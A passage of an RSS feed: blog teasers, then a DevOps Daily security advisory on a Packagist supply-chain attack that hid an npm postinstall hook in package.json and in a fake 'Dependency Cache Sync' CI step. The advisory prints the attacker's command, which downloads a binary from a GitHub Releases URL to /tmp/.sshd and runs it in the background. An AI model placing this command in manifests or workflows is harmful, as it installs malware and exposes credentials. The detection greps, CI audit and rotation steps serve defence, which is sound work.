<h3 id="h3-rider-20262-eap-3-cost-effective-agentic-test-coverage-code-change-previews-gamedev-templates-and-nuget-improvements" class="group relative scroll-mt-24">
        <a href="#h3-rider-20262-eap-3-cost-effective-agentic-test-coverage-code-change-previews-gamedev-templates-and-nuget-improvements" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Rider 2026.2 EAP 3: Cost-effective Agentic Test Coverage, Code Change Previews, GameDev Templates, and NuGet Improvements
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-rider-20262-eap-3-cost-effective-agentic-test-coverage-code-change-previews-gamedev-templates-and-nuget-improvements"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>JetBrains Rider 2026.2 EAP 3 is out! You can download this version from our website, update directly from within the IDE, use the free Toolbox App, or install it via snap packages. Here’s what you can</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/dotnet/2026/05/22/rider-2026-2-eap-3-cost-effective-agentic-test-coverage-code-change-previews-gamedev-templates-and-nuget-improvements/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-decoding-design-how-design-and-engineering-thrive-together-in-open-source" class="group relative scroll-mt-24">
        <a href="#h3-decoding-design-how-design-and-engineering-thrive-together-in-open-source" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Decoding design: How design and engineering thrive together in open source
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-decoding-design-how-design-and-engineering-thrive-together-in-open-source"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Open source thrives on engineering-driven processes. Fast feedback loops, terminal tools, Git workflows: they’re the lifeblood of how we build software in the open. But for software to truly excel, we</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/decoding-design-how-design-and-engineering-thrive-together-in-open-source"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-friday-five-may-22-2026" class="group relative scroll-mt-24">
        <a href="#h3-friday-five-may-22-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Friday Five — May 22, 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-friday-five-may-22-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Fierce Network: Red Hat CTO says these are 3 big things it’s working on with telcosVerizon took to the keynote stage at Red Hat Summit to talk up its network modernization work with the vendor. Red Ha</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/friday-five-may-22-2026-red-hat"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-developing-web-apps-with-local-llm-inference" class="group relative scroll-mt-24">
        <a href="#h3-developing-web-apps-with-local-llm-inference" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Developing web apps with local LLM inference
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-developing-web-apps-with-local-llm-inference"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>I’ve yet to meet a developer that enjoys working with metered AI APIs. The need to pay for every API call in development works in direct opposition to the ethos of rapid iteration, and it’s easy for t</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/developing-web-apps-with-local-llm-inference"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-even-is-the-harness-in-ai" class="group relative scroll-mt-24">
        <a href="#h3-what-even-is-the-harness-in-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What even is the harness in AI?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-even-is-the-harness-in-ai"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>I recently saw OpenClaw referred to as a harness. I thought, “That’s interesting. OpenClaw isn’t a harness. It’s an agent runtime—it drives the agent loop.” So, what does the word &quot;harness&quot; even mean?</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/what-even-harness-ai"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-red-hats-approach-to-keyboard-testing-for-web-accessibility" class="group relative scroll-mt-24">
        <a href="#h3-red-hats-approach-to-keyboard-testing-for-web-accessibility" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Red Hat's Approach to Keyboard Testing for Web Accessibility
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-red-hats-approach-to-keyboard-testing-for-web-accessibility"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>One of the core principles of Red Hat’s open source culture is open exchange, which is the belief that information should be freely available and accessible to anyone. I recently represented Red Hat a</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/beyond-automation-why-manual-keyboard-testing-essential-real-accessibility"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[When the Malicious Hook Is in the Other Manifest: 700+ Repos, 8 Packagist Packages, One package.json Trick]]></title>
      <link>https://devops-daily.com/posts/postinstall-hidden-in-package-json-php-supply-chain-may-2026</link>
      <description><![CDATA[On May 22, 2026, Socket disclosed a Composer supply chain attack that hid an npm-style postinstall command inside package.json on PHP projects. composer.json was clean, the PHP review missed it, and 700+ GitHub repos pulled it in. Here is the exact payload, why ecosystem-boundary blindness keeps catching teams, and how to wire your CI to look at both manifests.]]></description>
      <pubDate>Sat, 23 May 2026 09:30:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/postinstall-hidden-in-package-json-php-supply-chain-may-2026</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Supply Chain]]></category><category><![CDATA[Security]]></category><category><![CDATA[Packagist]]></category><category><![CDATA[npm]]></category><category><![CDATA[PHP]]></category><category><![CDATA[GitHub Actions]]></category>
      <content:encoded><![CDATA[<p>On May 22, 2026, <a href="https://socket.dev/blog/malicious-postinstall-hook-found-across-700-github-repos">Socket disclosed</a> a supply chain campaign that confirmed something defenders already half-knew: if your project carries two ecosystems&#39; manifests, an attacker only has to poison the one your review process ignores. The campaign hit eight Packagist (PHP / Composer) packages including the popular Laravel SaaS starter <code>devdojo/wave</code> (6,400 GitHub stars) and <code>devdojo/genesis</code> (9,100 Packagist installs). The malicious code was not in <code>composer.json</code>. It was in <code>package.json</code>. A PHP team running their normal Composer dependency review would never have seen it.</p>
<p>Within 17 hours of detection, a GitHub code search for the attacker-controlled account <code>parikhpreyash4</code> was returning hundreds of public code results across Node.js repositories. The total reach landed somewhere north of 700 GitHub repos pulling the same install hook, with a secondary spread vector hiding in <code>.github/workflows/ci.yml</code> as a step innocently named &quot;Dependency Cache Sync&quot;.</p>
<p>This post covers what the payload does, why the cross-manifest hiding trick keeps working, the one-liner that tells you whether any PHP repo you maintain is exposed, and how to make your CI look at every manifest a repo carries instead of just the one that matches the language you think it&#39;s written in.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>8 Packagist packages were compromised by adding an npm-style <code>postinstall</code> script to <code>package.json</code> (not <code>composer.json</code>). Most were development branches (<code>dev-main</code>, <code>dev-master</code>, <code>3.x-dev</code>), which is enough to hit anyone pinning to a branch instead of a tag.</li>
<li>The script downloads a Linux binary from a GitHub Releases URL, saves it as <code>/tmp/.sshd</code>, makes it executable, and runs it in the background. The binary itself was pulled from GitHub before researchers could grab a copy.</li>
<li>The attacker also injected the same command into <code>.github/workflows/ci.yml</code> of public forks as a step called &quot;Dependency Cache Sync&quot;. A merged PR can plant this; subsequent CI runs will re-infect even after the package itself is cleaned.</li>
<li>The PHP angle is the story. Cross-ecosystem manifests in a single repo are normal (any Laravel app with a Vite or Tailwind build ships both <code>composer.json</code> and <code>package.json</code>). Most security review pipelines only audit the manifest of the language they think the repo is.</li>
<li>Detection one-liner is at the bottom. Rotation order at the very bottom.</li>
</ul>
<h2 id="h2-the-exact-payload" class="group relative scroll-mt-24">
        <a href="#h2-the-exact-payload" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The exact payload
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-exact-payload"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This is the literal command the attacker added to <code>package.json</code>&#39;s <code>scripts.postinstall</code> field:</p>
<pre><code class="hljs language-bash">curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2&gt;/dev/null &amp;&amp; <span class="hljs-built_in">chmod</span> +x /tmp/.sshd &amp;&amp; /tmp/.sshd &amp;
</code></pre><p>Four things to notice:</p>
<ol>
<li><code>-s</code> suppresses curl&#39;s progress meter, <code>-k</code> skips TLS certificate verification, <code>-L</code> follows redirects. The verification skip is the tell. Nothing legitimate downloads a release binary with <code>-k</code>.</li>
<li>The output path <code>/tmp/.sshd</code> is chosen to look like a system file. A casual <code>ls /tmp</code> won&#39;t see it (leading dot is hidden), and a <code>ps aux | grep ssh</code> returns a process that looks like the real OpenSSH daemon.</li>
<li><code>2&gt;/dev/null</code> discards stderr, so a failed download produces no log line.</li>
<li>The <code>&amp;</code> at the end forks the binary into the background and returns immediately. From the CI runner&#39;s perspective, <code>npm install</code> finished cleanly. The malicious binary is now running.</li>
</ol>
<p>The binary itself (<code>gvfsd-network</code>) was hosted at:</p>
<pre><code class="hljs language-text">https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network
</code></pre><p>Both the file name and the repo name are deliberate noise. <code>gvfsd-network</code> looks like a GNOME virtual filesystem helper. <code>systemd-network-helper-aa5c751f</code> looks like an internal systemd component with a commit-hash suffix. Neither is real. The attacker yanked the binary from GitHub Releases before Socket could grab a sample, so we don&#39;t know what stage 2 did, but the install pattern (background binary, hidden path, suppressed errors) is consistent with a credential stealer or a persistent C2 beacon, which is what every other Shai-Hulud and Mini-Shai-Hulud wave this month has shipped.</p>
<h2 id="h2-the-packagejson-trick" class="group relative scroll-mt-24">
        <a href="#h2-the-packagejson-trick" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The package.json trick
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-packagejson-trick"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Composer packages are PHP. Their canonical manifest is <code>composer.json</code>. A PHP team&#39;s dependency review pipeline reads <code>composer.json</code> and <code>composer.lock</code>. They look for new dependencies, version bumps, suspicious authors, and anything weird in <code>scripts</code> (Composer has its own <code>scripts</code> system that runs PHP class methods).</p>
<p>Composer packages can also ship <code>package.json</code> for their build-time JavaScript assets. <code>devdojo/wave</code> is a Laravel starter that includes a Tailwind UI; the repo carries both manifests. When you <code>composer require devdojo/wave</code>, Composer doesn&#39;t run npm scripts. But the project&#39;s <code>package.json</code> is now sitting in your <code>vendor/devdojo/wave/</code> directory, and the moment your build pipeline does an <code>npm install</code> against it (or against your monorepo from its root, picking up nested <code>node_modules</code>), the <code>postinstall</code> hook fires.</p>
<p>That is the only ecosystem boundary the attacker had to cross. Their malicious commit looks like a normal commit to a Composer package, with a one-line addition to a file PHP devs never read.</p>
<p>This is not theoretical. Every Laravel project with a Vite or Tailwind build has the dual-manifest shape. Every npm package that ships native bindings has both <code>package.json</code> and <code>binding.gyp</code>. Every Cargo crate that vendors a Python wheel has both <code>Cargo.toml</code> and <code>pyproject.toml</code>. The defender pattern of &quot;audit the manifest of the ecosystem we think we are in&quot; is wrong every time.</p>
<h2 id="h2-the-github-actions-re-infection-vector" class="group relative scroll-mt-24">
        <a href="#h2-the-github-actions-re-infection-vector" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The GitHub Actions re-infection vector
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-github-actions-re-infection-vector"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Socket also found the same install command embedded in <code>.github/workflows/ci.yml</code> of <code>448776129/UA2F</code>, a public fork of <code>Zxilly/UA2F</code>, as a workflow step named <strong>Dependency Cache Sync</strong>.</p>
<pre><code class="hljs language-yaml"><span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">Dependency</span> <span class="hljs-string">Cache</span> <span class="hljs-string">Sync</span>
  <span class="hljs-attr">run:</span> <span class="hljs-string">|
    curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2&gt;/dev/null \
      &amp;&amp; chmod +x /tmp/.sshd \
      &amp;&amp; /tmp/.sshd &amp;</span>
</code></pre><p>The step name is the malicious part. &quot;Dependency Cache Sync&quot; sounds like a routine step you&#39;d skim past in a PR review. It looks like every other CI cache step you&#39;ve seen.</p>
<p>Why this matters: the GitHub Actions step survives the Packagist cleanup. Packagist removed the bad versions, but a fork that already merged the malicious workflow step keeps re-infecting its own CI runner on every push. If those runners have OIDC tokens for cloud accounts, or push permissions back to the upstream repo, that re-infection turns into a propagation loop that the original cleanup did nothing about.</p>
<p>If the original Packagist take-down felt like the end of the story when you saw the news yesterday, this is the part that isn&#39;t done.</p>
<h2 id="h2-are-you-exposed-one-liner-grep" class="group relative scroll-mt-24">
        <a href="#h2-are-you-exposed-one-liner-grep" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Are you exposed? One-liner grep
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-are-you-exposed-one-liner-grep"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The fast check across every repo you maintain locally. From a parent directory:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Find any package.json scripts that download a binary from a GitHub release</span>
<span class="hljs-comment"># and pipe it into /tmp/. Catches the parikhpreyash4 campaign and any near-copies.</span>
find . -name package.json -not -path <span class="hljs-string">&#x27;*/node_modules/*&#x27;</span> -print0 \
  | xargs -0 grep -l -E <span class="hljs-string">&#x27;curl.*github\.com.*releases.*-o /tmp/\.&#x27;</span> 2&gt;/dev/null
</code></pre><p>And for already-installed Composer dependencies on a running app, check <code>vendor/</code>:</p>
<pre><code class="hljs language-bash">find vendor -name package.json -print0 \
  | xargs -0 grep -l -E <span class="hljs-string">&#x27;curl.*github\.com.*releases.*-o /tmp/\.&#x27;</span> 2&gt;/dev/null
</code></pre><p>The narrower check for the exact known IoCs:</p>
<pre><code class="hljs language-bash">grep -RE <span class="hljs-string">&#x27;parikhpreyash4|systemd-network-helper-aa5c751f|/tmp/\.sshd&#x27;</span> \
  --include=<span class="hljs-string">&#x27;package.json&#x27;</span> --include=<span class="hljs-string">&#x27;*.yml&#x27;</span> --include=<span class="hljs-string">&#x27;*.yaml&#x27;</span> \
  -l . 2&gt;/dev/null
</code></pre><p>On a running CI runner, also check for the binary itself:</p>
<pre><code class="hljs language-bash"><span class="hljs-built_in">ls</span> -la /tmp/.sshd 2&gt;/dev/null \
  &amp;&amp; ps auxf | awk <span class="hljs-string">&#x27;/[\.]sshd|sshd / {print}&#x27;</span>
</code></pre><p>A real OpenSSH daemon will be <code>/usr/sbin/sshd</code>. A process running from <code>/tmp/.sshd</code> is the malware, regardless of how it shows up in <code>ps</code>.</p>
<h2 id="h2-hardening-make-ci-look-at-every-manifest" class="group relative scroll-mt-24">
        <a href="#h2-hardening-make-ci-look-at-every-manifest" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Hardening: make CI look at every manifest
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-hardening-make-ci-look-at-every-manifest"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The structural fix is to scan every manifest in every repo, regardless of what language you think the repo is. A minimal GitHub Actions step that does the right thing:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">name:</span> <span class="hljs-string">Cross-manifest</span> <span class="hljs-string">dependency</span> <span class="hljs-string">audit</span>
<span class="hljs-attr">on:</span>
  <span class="hljs-attr">pull_request:</span>
  <span class="hljs-attr">push:</span>
    <span class="hljs-attr">branches:</span> [<span class="hljs-string">main</span>]

<span class="hljs-attr">jobs:</span>
  <span class="hljs-attr">audit:</span>
    <span class="hljs-attr">runs-on:</span> <span class="hljs-string">ubuntu-latest</span>
    <span class="hljs-attr">steps:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">uses:</span> <span class="hljs-string">actions/checkout@v4</span>

      <span class="hljs-comment"># Run Socket&#x27;s scanner against every manifest in the repo, not just</span>
      <span class="hljs-comment"># the one matching the primary language. Socket reads composer.json,</span>
      <span class="hljs-comment"># package.json, requirements.txt, Cargo.toml, go.mod, and others —</span>
      <span class="hljs-comment"># so a Composer repo with a hidden package.json hook gets caught.</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">Socket</span> <span class="hljs-string">audit</span> <span class="hljs-string">(every</span> <span class="hljs-string">manifest)</span>
        <span class="hljs-attr">uses:</span> <span class="hljs-string">SocketDev/socket-security-action@v1</span>
        <span class="hljs-attr">with:</span>
          <span class="hljs-attr">api-key:</span> <span class="hljs-string">${{</span> <span class="hljs-string">secrets.SOCKET_API_KEY</span> <span class="hljs-string">}}</span>

      <span class="hljs-comment"># A defense-in-depth grep for the install-time-script pattern. Cheap,</span>
      <span class="hljs-comment"># zero deps, catches obvious cases even on repos that don&#x27;t have a</span>
      <span class="hljs-comment"># Socket org set up.</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">Grep</span> <span class="hljs-string">for</span> <span class="hljs-string">install-time</span> <span class="hljs-string">binary</span> <span class="hljs-string">downloads</span>
        <span class="hljs-attr">run:</span> <span class="hljs-string">|
          set -euo pipefail
          MATCHES=$(grep -rE &#x27;curl.*github\.com.*releases.*-o /tmp/\.&#x27; \
            --include=&#x27;package.json&#x27; --include=&#x27;composer.json&#x27; \
            --include=&#x27;*.yml&#x27; --include=&#x27;*.yaml&#x27; \
            . || true)
          if [ -n &quot;$MATCHES&quot; ]; then
            echo &quot;::error::Install hook downloads binary to /tmp/. Refusing build.&quot;
            echo &quot;$MATCHES&quot;
            exit 1
          fi</span>
</code></pre><p>Two things to wire into your branch protection on top of that:</p>
<ul>
<li><strong>Block any PR that adds or modifies a <code>postinstall</code>, <code>preinstall</code>, or <code>install</code> script in <code>package.json</code></strong> without a CODEOWNERS review by your security team. This is policy, not tooling. Your CODEOWNERS file can target <code>package.json</code> directly.</li>
<li><strong>Pin Composer dependencies to tags, not branches.</strong> Every package in this campaign was compromised on <code>dev-main</code>, <code>dev-master</code>, or <code>3.x-dev</code>. If your <code>composer.json</code> has <code>&quot;devdojo/wave&quot;: &quot;dev-main&quot;</code>, Composer pulls whatever the branch HEAD is at install time, which is exactly what attackers want. Pin to a semver tag instead: <code>&quot;devdojo/wave&quot;: &quot;^1.4.2&quot;</code>.</li>
</ul>
<p>For GitHub Actions workflows, set <code>permissions: contents: read</code> at the workflow level and require explicit elevation in any step that needs <code>write</code>. A &quot;Dependency Cache Sync&quot; step that needs <code>contents: write</code> to push a binary download into <code>/tmp/</code> is suddenly very visible in a PR diff.</p>
<h2 id="h2-if-you-were-exposed-rotation-order" class="group relative scroll-mt-24">
        <a href="#h2-if-you-were-exposed-rotation-order" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          If you were exposed: rotation order
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-if-you-were-exposed-rotation-order"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Same drill as every other supply chain compromise in May. If a runner or developer machine executed the postinstall hook, treat everything reachable from that machine as burned.</p>
<ol>
<li><strong>GitHub tokens first.</strong> <code>gh auth logout</code>, revoke every PAT at <a href="https://github.com/settings/tokens">https://github.com/settings/tokens</a>, reissue with minimum scope. Doing this first prevents the attacker from pushing a worm-propagation commit to repos you maintain.</li>
<li><strong>Cloud STS sessions.</strong> AWS: revoke active sessions for the IAM role that the runner used. GCP: <code>gcloud auth revoke --all</code>. Azure: <code>az logout &amp;&amp; az account clear</code>.</li>
<li><strong>Long-lived cloud keys.</strong> Rotate IAM access keys, GCP service account JSON keys, Azure SP credentials. Anything that was on disk in <code>~/.aws/credentials</code> or the equivalent.</li>
<li><strong>SSH keys.</strong> Reissue keypairs. Remove the compromised machine&#39;s public key from every <code>authorized_keys</code> it sat in.</li>
<li><strong>Kubeconfig.</strong> Rotate the cluster CA-signed certs for the user.</li>
<li><strong>App secrets.</strong> Anything in <code>.env</code>, anything in your secrets manager that the runner had pull access to.</li>
<li><strong>Composer auth tokens.</strong> <code>~/.composer/auth.json</code> holds Packagist credentials, private repository tokens, and GitHub OAuth for Composer. Rotate them.</li>
</ol>
<p>Then nuke <code>/tmp/.sshd</code> and any running process from it, and rebuild the runner from a known-clean image. Don&#39;t try to clean up in place. The binary was background-forked, it could have written persistence elsewhere, and you can&#39;t grep your way to confidence on a host that ran an unknown stage-2 binary.</p>
<h2 id="h2-why-this-keeps-happening" class="group relative scroll-mt-24">
        <a href="#h2-why-this-keeps-happening" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why this keeps happening
        </a>
        <button 
